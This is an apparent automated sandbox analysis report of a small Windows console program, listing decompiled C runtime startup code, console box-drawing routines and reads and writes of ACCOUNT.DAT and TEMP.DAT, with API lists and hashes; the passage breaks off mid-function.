                                              0x00d8a7d5
                                              0x00000000
                                              0x00000000
                                              0x00d8a7d7
                                              0x00d8a7d9
                                              0x00d8a7de
                                              0x00d8a7e1
                                              0x00d8a7eb
                                              0x00d8a7ee
                                              0x00d8a7f9
                                              0x00d8a7fe
                                              0x00d8a802
                                              0x00d8a808
                                              0x00d8a82f
                                              0x00d8a82f
                                              0x00000000
                                              0x00d8a82f
                                              0x00d8a7f4
                                              0x00d8a7f4
                                              0x00d8a7f6
                                              0x00d8a7f6
                                              0x00000000
                                              0x00d8a7f6
                                              0x00d8a7e7
                                              0x00000000
                                              0x00d8a7e7
                                              0x00d8a7c6
                                              0x00d8a790
                                              0x00d8a793
                                              0x00000000
                                              0x00000000
                                              0x00d8a79b
                                              0x00000000
                                              0x00d8a79b
                                              0x00d8a835
                                              0x00d8a83c
                                              0x00d8a5b6
                                              0x00d8a5b8
                                              0x00d8a5b9
                                              0x00d8a5be
                                              0x00d8a5be
                                              0x00d8a648
                                              0x00d8a64b
                                              0x00d8a64d
                                              0x00000000
                                              0x00000000
                                              0x00d8a653
                                              0x00d8a655
                                              0x00d8a658
                                              0x00d8a65b
                                              0x00d8a660
                                              0x00d8a668
                                              0x00d8a66a
                                              0x00d8a66c
                                              0x00d8a66e
                                              0x00d8a66e
                                              0x00d8a673
                                              0x00d8a673
                                              0x00d8a674
                                              0x00d8a677
                                              0x00d8a677
                                              0x00d8a67d
                                              0x00000000
                                              0x00000000
                                              0x00d8a689
                                              0x00d8a68b
                                              0x00d8a68e
                                              0x00d8a690
                                              0x00d8a724
                                              0x00d8a72b
                                              0x00d8a72b
                                              0x00d8a731
                                              0x00d8a73d
                                              0x00d8a73f
                                              0x00000000
                                              0x00000000
                                              0x00d8a741
                                              0x00d8a747
                                              0x00d8a74a
                                              0x00d8a74d
                                              0x00d8a751
                                              0x00d8a757
                                              0x00d8a75a
                                              0x00d8a75d
                                              0x00d8a760
                                              0x00d8a760
                                              0x00d8a765
                                              0x00d8a766
                                              0x00d8a769
                                              0x00000000
                                              0x00d8a769
                                              0x00d8a696
                                              0x00d8a69c
                                              0x00000000
                                              0x00d8a69c
                                              0x00d8a69f
                                              0x00d8a6a1
                                              0x00d8a6a4
                                              0x00d8a6a7
                                              0x00d8a6aa
                                              0x00d8a6aa
                                              0x00d8a6ac
                                              0x00000000
                                              0x00000000
                                              0x00d8a6b2
                                              0x00d8a6b4
                                              0x00d8a6b7
                                              0x00d8a711
                                              0x00d8a711
                                              0x00d8a712
                                              0x00d8a718
                                              0x00d8a719
                                              0x00d8a71c
                                              0x00d8a71f
                                              0x00000000
                                              0x00d8a71f
                                              0x00d8a6b9
                                              0x00d8a6bc
                                              0x00000000
                                              0x00000000
                                              0x00d8a6be
                                              0x00d8a6c0
                                              0x00d8a6c2
                                              0x00000000
                                              0x00000000
                                              0x00d8a6c4
                                              0x00d8a6c6
                                              0x00d8a6d6
                                              0x00d8a6e3
                                              0x00d8a6ea
                                              0x00d8a6ef
                                              0x00d8a6f6
                                              0x00d8a6fe
                                              0x00d8a702
                                              0x00d8a708
                                              0x00d8a708
                                              0x00d8a708
                                              0x00d8a70b
                                              0x00d8a70e
                                              0x00d8a70e
                                              0x00000000
                                              0x00d8a70e
                                              0x00d8a6c9
                                              0x00d8a6cf
                                              0x00d8a6d2
                                              0x00d8a6d4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8a6d4
                                              0x00000000
                                              0x00d8a6aa
                                              0x00d8a5e2
                                              0x00d8a5ea
                                              0x00000000
                                              0x00d8a5ea
                                              0x00d8a5ae
                                              0x00000000

                                              APIs
                                              • __lock.LIBCMT ref: 00D8A590
                                                • Part of subcall function 00D8BDFF: __mtinitlocknum.LIBCMT ref: 00D8BE11
                                                • Part of subcall function 00D8BDFF: EnterCriticalSection.KERNEL32(?,?,00D8D608,0000000D,?,?,?,?,00D9DA28,00000008,00D8D5A1,00000000,00000000,00D88EA4,00D91DF6,00000000), ref: 00D8BE2A
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D8A5AE
                                              • __calloc_crt.LIBCMT ref: 00D8A5C7
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D8A5E2
                                              • GetStartupInfoW.KERNEL32(?,00D9D8C0,00000064), ref: 00D8A637
                                              • __calloc_crt.LIBCMT ref: 00D8A682
                                              • GetFileType.KERNEL32(00000001), ref: 00D8A6C9
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D8A702
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00D8A7BB
                                              • GetFileType.KERNEL32(00000000), ref: 00D8A7CD
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-00DA2F54,00000FA0), ref: 00D8A802
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 1456538442-0
                                              • Opcode ID: d2d2215264139ca6a3d1d5b54afd3937d47f88dfe84cb7d7be63eceb717c4cc9
                                              • Instruction ID: b1451b256f8cb52ae2cecd6c0562c5be7a6524d9222bc39a873079a60e86dd14
                                              • Opcode Fuzzy Hash: d2d2215264139ca6a3d1d5b54afd3937d47f88dfe84cb7d7be63eceb717c4cc9
                                              • Instruction Fuzzy Hash: E191BE719047458FEB14EF6DC8415A9BBB0EF06320B28426FD4A6EB3A1D7349843DB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D88847, Relevance: 16.6, APIs: 11, Instructions: 84COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				void* _t24;
				void* _t25;
				void* _t26;
				signed int _t38;
				void* _t40;
				void* _t46;
				signed int _t49;
				void* _t51;
				void* _t53;
				void* _t60;

				_t60 = __fp0;
				_t47 = __edi;
				_t46 = __edx;
				E00D8FBE8();
				_push(0x14);
				_push(0xd9d838);
				E00D89100(__ebx, __edi, __esi);
				_t49 = E00D8BFB3() & 0x0000ffff;
				E00D8FB9B(2);
				_t53 =  *0xd80000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t17 =  *0xd8003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t17 + 0xd80000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0xd80000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0xd80018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0xd80018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0xd80074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0xd80074)) > 0xe) {
								__eflags =  *(_t17 + 0xd800e8);
								_t6 =  *(_t17 + 0xd800e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t51 - 0x1c) = _t38;
				if(E00D8CFF8() == 0) {
					E00D88995(0x1c);
				}
				if(E00D8D672(_t38, _t47) == 0) {
					_t19 = E00D88995(0x10);
				}
				E00D8BDBF(_t19);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				E00D8A563();
				 *0xda4080 = GetCommandLineA();
				 *0xda2284 = E00D8FC82();
				_t24 = E00D8F88D();
				_t56 = _t24;
				if(_t24 < 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t56, 8);
				}
				_t25 = E00D8FABA(_t38, _t46, _t47, _t49);
				_t57 = _t25;
				if(_t25 < 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t57, 9);
				}
				_t26 = E00D874F9(_t47, _t49, 1);
				_pop(_t40);
				_t58 = _t26;
				if(_t26 != 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t58, _t26);
					_pop(_t40);
				}
				_t50 = E00D81000(_t40, _t47, _t49, _t58, _t60, 0xd80000, 0, E00D8FD0D(), _t49);
				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
				if(_t38 == 0) {
					E00D87751(_t50);
				}
				E00D874EA();
				 *(_t51 - 4) = 0xfffffffe;
				return E00D89145(_t50);
			}














                                              0x00d88847
                                              0x00d88847
                                              0x00d88847
                                              0x00d88847
                                              0x00d88851
                                              0x00d88853
                                              0x00d88858
                                              0x00d88862
                                              0x00d88867
                                              0x00d88872
                                              0x00d88879
                                              0x00d8887f
                                              0x00d88884
                                              0x00d8888e
                                              0x00000000
                                              0x00d88890
                                              0x00d88895
                                              0x00d8889c
                                              0x00000000
                                              0x00d8889e
                                              0x00d8889e
                                              0x00d888a0
                                              0x00d888a7
                                              0x00d888a9
                                              0x00d888af
                                              0x00d888af
                                              0x00d888af
                                              0x00d888af
                                              0x00d888a7
                                              0x00d8889c
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d888b2
                                              0x00d888bc
                                              0x00d888c0
                                              0x00d888c5
                                              0x00d888cd
                                              0x00d888d1
                                              0x00d888d6
                                              0x00d888d7
                                              0x00d888dc
                                              0x00d888e0
                                              0x00d888eb
                                              0x00d888f5
                                              0x00d888fa
                                              0x00d888ff
                                              0x00d88901
                                              0x00d88905
                                              0x00d8890a
                                              0x00d8890b
                                              0x00d88910
                                              0x00d88912
                                              0x00d88916
                                              0x00d8891b
                                              0x00d8891e
                                              0x00d88923
                                              0x00d88924
                                              0x00d88926
                                              0x00d88929
                                              0x00d8892e
                                              0x00d8892e
                                              0x00d88942
                                              0x00d88944
                                              0x00d88949
                                              0x00d8894c
                                              0x00d8894c
                                              0x00d88951
                                              0x00d88986
                                              0x00d88994

                                              APIs
                                              • ___security_init_cookie.LIBCMT ref: 00D88847
                                                • Part of subcall function 00D8BFB3: GetStartupInfoW.KERNEL32(?), ref: 00D8BFBD
                                              • _fast_error_exit.LIBCMT ref: 00D888C0
                                              • _fast_error_exit.LIBCMT ref: 00D888D1
                                              • __RTC_Initialize.LIBCMT ref: 00D888D7
                                              • __ioinit0.LIBCMT ref: 00D888E0
                                              • GetCommandLineA.KERNEL32(00D9D838,00000014), ref: 00D888E5
                                              • ___crtGetEnvironmentStringsA.LIBCMT ref: 00D888F0
                                              • __setargv.LIBCMT ref: 00D888FA
                                              • __setenvp.LIBCMT ref: 00D8890B
                                              • __cinit.LIBCMT ref: 00D8891E
                                              • __wincmdln.LIBCMT ref: 00D8892F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                              • String ID:
                                              • API String ID: 1504447550-0
                                              • Opcode ID: edece753fc02ba83ae6f49394f4dc0f9493aae36fa9d2c46f8117cf3db6395ad
                                              • Instruction ID: 98174e521d1b9063388cb62625ae492e90533887b8c6c0d43228cd806db17dda
                                              • Opcode Fuzzy Hash: edece753fc02ba83ae6f49394f4dc0f9493aae36fa9d2c46f8117cf3db6395ad
                                              • Instruction Fuzzy Hash: 4121F960A4430599EB607BB4AC47B3D3674DF00711FA9442AF648DA1D3DFB5C984BB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D88DC3, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D88DC3(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E00D8A547(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E00D900D2(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0xda2f60; // 0x0
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E00D900D2(2);
							if(E00D900D2(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E00D900D2(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E00D9004C(_t35);
					 *((char*)( *((intOrPtr*)(0xda2f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E00D88E7E(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                              0x00d88dc6
                                              0x00d88dcd
                                              0x00d88dd6
                                              0x00d88de3
                                              0x00d88e35
                                              0x00d88e35
                                              0x00d88de5
                                              0x00d88de5
                                              0x00d88ded
                                              0x00d88dfb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d88e03
                                              0x00d88e03
                                              0x00d88e05
                                              0x00d88e17
                                              0x00000000
                                              0x00d88e19
                                              0x00d88e19
                                              0x00d88e29
                                              0x00000000
                                              0x00d88e2b
                                              0x00d88e31
                                              0x00d88e31
                                              0x00d88e29
                                              0x00d88e17
                                              0x00d88ded
                                              0x00d88e38
                                              0x00d88e50
                                              0x00d88e57
                                              0x00d88e65
                                              0x00d88e59
                                              0x00d88e60
                                              0x00d88e60
                                              0x00d88e6a
                                              0x00d88dcf
                                              0x00d88dd3
                                              0x00d88dd3

                                              APIs
                                              • __ioinit.LIBCMT ref: 00D88DC6
                                                • Part of subcall function 00D8A547: InitOnceExecuteOnce.KERNEL32(00DA229C,00D8A582,00000000,00000000,00D911A5,?,?,00D89826,00000000,?,?,?,00D8714D,-00000020,00D9D7B8,0000000C), ref: 00D8A555
                                              • __get_osfhandle.LIBCMT ref: 00D88DDA
                                              • __get_osfhandle.LIBCMT ref: 00D88E05
                                              • __get_osfhandle.LIBCMT ref: 00D88E0E
                                              • __get_osfhandle.LIBCMT ref: 00D88E1A
                                              • CloseHandle.KERNEL32(00000000,00D825F6,00000000,?,00D9414B,00D825F6,?,?,?,?,?,?,?,00D825F6,00000000,00000109), ref: 00D88E21
                                              • GetLastError.KERNEL32(?,00D9414B,00D825F6,?,?,?,?,?,?,?,00D825F6,00000000,00000109), ref: 00D88E2B
                                              • __free_osfhnd.LIBCMT ref: 00D88E38
                                              • __dosmaperr.LIBCMT ref: 00D88E5A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                              • String ID:
                                              • API String ID: 974577687-0
                                              • Opcode ID: bfca4ce97d2cad367b4331a9ae938a6b66e17502ccd90a14dc7b475265e7a26d
                                              • Instruction ID: bfb185fb32f5f7585bdcfd41b46f6d9b3f72c2149a9804043b4608352689b37e
                                              • Opcode Fuzzy Hash: bfca4ce97d2cad367b4331a9ae938a6b66e17502ccd90a14dc7b475265e7a26d
                                              • Instruction Fuzzy Hash: 671125326002541ED6223239A84973F3A489F52B74FA90359F81DCB2D2EE22CC41A3B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D83A50, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 203COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D83AE8
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _fprintf.LIBCMT ref: 00D83D46
                                              Strings
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D83ADD
                                              • TEMP.DAT, xrefs: 00D83A82
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D83D3A
                                              • ACCOUNT.DAT, xrefs: 00D83A5E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __fsopen_fprintf_swscanf_vfscanf
                                              • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                              • API String ID: 1563022539-2055742014
                                              • Opcode ID: d8fc85008701909834cd05bc99fb34df7ea912c9741b92904899df6eddfa8807
                                              • Instruction ID: b0c3b2ba049aff2323b43c2ffd5a2525d821c0598d2f44ca2d45d7d62335d67b
                                              • Opcode Fuzzy Hash: d8fc85008701909834cd05bc99fb34df7ea912c9741b92904899df6eddfa8807
                                              • Instruction Fuzzy Hash: 6E91F872C106599ECB09DFA9D991BFDFB79EF46300F04826EE006BA191E6745684CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D81320, Relevance: 10.6, APIs: 7, Instructions: 126COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E00D81320(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t61;
				intOrPtr _t67;
				void* _t75;
				intOrPtr _t87;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t102 = __esi;
				_t101 = __edi;
				E00D81250(_a4, _a8);
				_push(0xc9);
				_push("%c");
				E00D870FC(_t75, __edi, __esi, __eflags);
				_t104 = _t103 + 8;
				_v8 = _a4 + 1;
				while(1) {
					_t109 = _v8 - _a12 - 1;
					if(_v8 >= _a12 - 1) {
						break;
					}
					E00D81250(_v8, _a8);
					_push(0xcd);
					_push("%c");
					E00D870FC(_t75, _t101, _t102, _t109);
					_t104 = _t104 + 8;
					_v8 = _v8 + 1;
				}
				E00D81250(_v8, _a8);
				_push(0xbb);
				_push("%c");
				E00D870FC(_t75, _t101, _t102, __eflags);
				_t105 = _t104 + 8;
				_v12 = _a8 + 1;
				while(1) {
					__eflags = _v12 - _a16;
					if(__eflags >= 0) {
						break;
					}
					E00D81250(_a4, _v12);
					_v8 = _a4;
					while(1) {
						__eflags = _v8 - _a12;
						if(_v8 >= _a12) {
							break;
						}
						__eflags = _v8 - _a4;
						if(__eflags == 0) {
							L12:
							E00D81250(_v8, _v12);
							_push(0xba);
							_push("%c");
							E00D870FC(_t75, _t101, _t102, __eflags);
							_t105 = _t105 + 8;
						} else {
							__eflags = _v8 - _a12 - 1;
							if(__eflags == 0) {
								goto L12;
							}
						}
						_t67 = _v8 + 1;
						__eflags = _t67;
						_v8 = _t67;
					}
					_t87 = _v12 + 1;
					__eflags = _t87;
					_v12 = _t87;
				}
				E00D81250(_a4, _v12);
				_push(0xc8);
				_push("%c");
				E00D870FC(_t75, _t101, _t102, __eflags);
				_t106 = _t105 + 8;
				_v8 = _a4 + 1;
				while(1) {
					__eflags = _v8 - _a12 - 1;
					if(__eflags >= 0) {
						break;
					}
					E00D81250(_v8, _v12);
					_push(0xcd);
					_push("%c");
					E00D870FC(_t75, _t101, _t102, __eflags);
					_t106 = _t106 + 8;
					_t61 = _v8 + 1;
					__eflags = _t61;
					_v8 = _t61;
				}
				E00D81250(_v8, _v12);
				_push(0xbc);
				_push("%c");
				return E00D870FC(_t75, _t101, _t102, __eflags);
			}














                                              0x00d81320
                                              0x00d81320
                                              0x00d8132e
                                              0x00d81333
                                              0x00d81338
                                              0x00d8133d
                                              0x00d81342
                                              0x00d8134b
                                              0x00d81359
                                              0x00d8135f
                                              0x00d81362
                                              0x00000000
                                              0x00000000
                                              0x00d8136c
                                              0x00d81371
                                              0x00d81376
                                              0x00d8137b
                                              0x00d81380
                                              0x00d81356
                                              0x00d81356
                                              0x00d8138d
                                              0x00d81392
                                              0x00d81397
                                              0x00d8139c
                                              0x00d813a1
                                              0x00d813aa
                                              0x00d813b8
                                              0x00d813bb
                                              0x00d813be
                                              0x00000000
                                              0x00000000
                                              0x00d813c8
                                              0x00d813d0
                                              0x00d813de
                                              0x00d813e1
                                              0x00d813e4
                                              0x00000000
                                              0x00000000
                                              0x00d813e9
                                              0x00d813ec
                                              0x00d813f9
                                              0x00d81401
                                              0x00d81406
                                              0x00d8140b
                                              0x00d81410
                                              0x00d81415
                                              0x00d813ee
                                              0x00d813f4
                                              0x00d813f7
                                              0x00000000
                                              0x00000000
                                              0x00d813f7
                                              0x00d813d8
                                              0x00d813d8
                                              0x00d813db
                                              0x00d813db
                                              0x00d813b2
                                              0x00d813b2
                                              0x00d813b5
                                              0x00d813b5
                                              0x00d81424
                                              0x00d81429
                                              0x00d8142e
                                              0x00d81433
                                              0x00d81438
                                              0x00d81441
                                              0x00d8144f
                                              0x00d81455
                                              0x00d81458
                                              0x00000000
                                              0x00000000
                                              0x00d81462
                                              0x00d81467
                                              0x00d8146c
                                              0x00d81471
                                              0x00d81476
                                              0x00d81449
                                              0x00d81449
                                              0x00d8144c
                                              0x00d8144c
                                              0x00d81483
                                              0x00d81488
                                              0x00d8148d
                                              0x00d8149d

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8133D
                                              • _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D8139C
                                              • _wprintf.LIBCMT ref: 00D81410
                                              • _wprintf.LIBCMT ref: 00D81433
                                              • _wprintf.LIBCMT ref: 00D81471
                                              • _wprintf.LIBCMT ref: 00D81492
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID:
                                              • API String ID: 1778593935-0
                                              • Opcode ID: 0302356a46c06641ccb3b08ef1bdc9112c1c3a2a439852b2d9d95d2ae83ac77b
                                              • Instruction ID: b0b32b13d14405165fb373ec189598b213a525d5f5c993c981c4c2d853cedbd7
                                              • Opcode Fuzzy Hash: 0302356a46c06641ccb3b08ef1bdc9112c1c3a2a439852b2d9d95d2ae83ac77b
                                              • Instruction Fuzzy Hash: 00414F79A10208FFCB04FF98CD82E9E7779EF84704F208159F505AB281D631EA5A9B75
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8D672, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E00D8D672(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00D8759E(_t3);
				if(E00D8BF2E() != 0) {
					_t6 = E00D8BF78(_t5, E00D8D408);
					 *0xda1a40 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00D8C4FB(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00D8D6E8();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00D8BFA2(_t9,  *0xda1a40, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00D8D5C6(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00D8D6E8();
					return 0;
				}
			}








                                              0x00d8d672
                                              0x00d8d67e
                                              0x00d8d68d
                                              0x00d8d693
                                              0x00d8d698
                                              0x00d8d69b
                                              0x00000000
                                              0x00d8d69d
                                              0x00d8d6aa
                                              0x00d8d6ae
                                              0x00d8d6b0
                                              0x00d8d6df
                                              0x00d8d6df
                                              0x00d8d6e4
                                              0x00d8d6e7
                                              0x00d8d6b2
                                              0x00d8d6c0
                                              0x00d8d6c2
                                              0x00000000
                                              0x00d8d6c4
                                              0x00d8d6c4
                                              0x00d8d6c6
                                              0x00d8d6c7
                                              0x00d8d6ce
                                              0x00d8d6d4
                                              0x00d8d6d8
                                              0x00d8d6dc
                                              0x00d8d6de
                                              0x00d8d6de
                                              0x00d8d6c2
                                              0x00d8d6b0
                                              0x00d8d680
                                              0x00d8d680
                                              0x00d8d680
                                              0x00d8d687
                                              0x00d8d687

                                              APIs
                                              • __init_pointers.LIBCMT ref: 00D8D672
                                                • Part of subcall function 00D8759E: EncodePointer.KERNEL32(00000000,?,00D8D677,00D888CB,00D9D838,00000014), ref: 00D875A1
                                                • Part of subcall function 00D8759E: __initp_misc_winsig.LIBCMT ref: 00D875C2
                                              • __mtinitlocks.LIBCMT ref: 00D8D677
                                                • Part of subcall function 00D8BF2E: InitializeCriticalSectionAndSpinCount.KERNEL32(00DA13D0,00000FA0,?,?,00D8D67C,00D888CB,00D9D838,00000014), ref: 00D8BF4C
                                              • __mtterm.LIBCMT ref: 00D8D680
                                              • __calloc_crt.LIBCMT ref: 00D8D6A5
                                              • __initptd.LIBCMT ref: 00D8D6C7
                                              • GetCurrentThreadId.KERNEL32 ref: 00D8D6CE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                              • String ID:
                                              • API String ID: 2211675822-0
                                              • Opcode ID: bbec1664040fa2c146b2b45b54ec08aa3885de52818c7e438eb4495dcabcf227
                                              • Instruction ID: 5103b1754ab601b5d586d23889fa0107d2ca17a31c6e5434bfc6d2464aff05fd
                                              • Opcode Fuzzy Hash: bbec1664040fa2c146b2b45b54ec08aa3885de52818c7e438eb4495dcabcf227
                                              • Instruction Fuzzy Hash: DCF0903624A7696AE2247B7D7C0365A3786CF42770B34061AF459D51E1FF2298424774
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8BB0C, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E00D8BB0C(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E00D8A547(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E00D88B52(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
